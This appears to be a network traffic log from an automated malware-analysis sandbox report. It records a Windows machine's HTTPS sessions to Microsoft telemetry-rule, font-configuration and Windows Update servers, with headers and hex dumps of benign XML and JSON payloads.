                                                                                                                                                                                                                                                                                      2024-11-20 09:54:28 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      101192.168.2.64982713.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:28 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:28 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:28 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1401
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE055B528"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 07391f24-a01e-0032-508c-3a1949000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095428Z-185f5d8b95crwqd8hC1NYCps680000000a2000000000754r
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:28 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      102192.168.2.64982813.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:28 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:29 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:28 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1364
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE1223606"
                                                                                                                                                                                                                                                                                      x-ms-request-id: c9275c76-a01e-000d-7b8c-3ad1ea000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095428Z-r1d97b9957744xz5hC1TEB5bf800000008h000000000aubs
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:29 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      103192.168.2.64983313.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:29 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:29 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:29 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1397
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE7262739"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 5a5a1185-c01e-0079-408c-3ae51a000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095429Z-r1d97b99577mrt4rhC1TEBftkc00000008q00000000016w7
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:29 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      104192.168.2.64983413.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:29 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:29 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:29 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1360
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BDDEB5124"
                                                                                                                                                                                                                                                                                      x-ms-request-id: b47886c8-201e-00aa-0c8c-3a3928000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095429Z-r1d97b9957744xz5hC1TEB5bf800000008m00000000074vv
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:29 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      105192.168.2.64983513.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:29 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:29 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:29 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1403
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BDCB4853F"
                                                                                                                                                                                                                                                                                      x-ms-request-id: eb1e057a-b01e-0097-688c-3a4f33000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095429Z-r1d97b9957789nh9hC1TEBxha800000008y0000000000791
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:29 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      106192.168.2.64983613.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:29 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:29 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:29 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1366
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BDB779FC3"
                                                                                                                                                                                                                                                                                      x-ms-request-id: e2992625-501e-005b-678c-3ad7f7000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095429Z-r1d97b9957789g82hC1TEBstx000000008qg000000004mvq
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:29 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      107192.168.2.64983813.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:29 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:29 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:29 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1397
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BDFD43C07"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 073920b7-a01e-0032-4c8c-3a1949000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095429Z-185f5d8b95cp7lkfhC1NYC7rpw0000000a6g000000007g3q
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:29 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      108192.168.2.649837184.28.90.27443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:29 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                                      If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                      Range: bytes=0-2147483646
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                      Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:30 UTC514INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      ApiVersion: Distribute 1.1
                                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                      Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                                                                                      X-CID: 11
                                                                                                                                                                                                                                                                                      X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                                      X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=24730
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:29 GMT
                                                                                                                                                                                                                                                                                      Content-Length: 55
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      X-CID: 2
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:30 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                                                                      Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      109192.168.2.64983920.12.23.50443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:29 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=EnPNfHXroMtz3vU&MD=Ptzta2Fs HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                                      Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:30 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                      Expires: -1
                                                                                                                                                                                                                                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                                      ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                                                                                      MS-CorrelationId: dacc1c70-664e-4663-bc4d-0f6f9aa78af4
                                                                                                                                                                                                                                                                                      MS-RequestId: 8ee94f0a-408a-4cac-8b7e-30cafe4c11d1
                                                                                                                                                                                                                                                                                      MS-CV: lBp+Z0ZCLki87iOf.0
                                                                                                                                                                                                                                                                                      X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
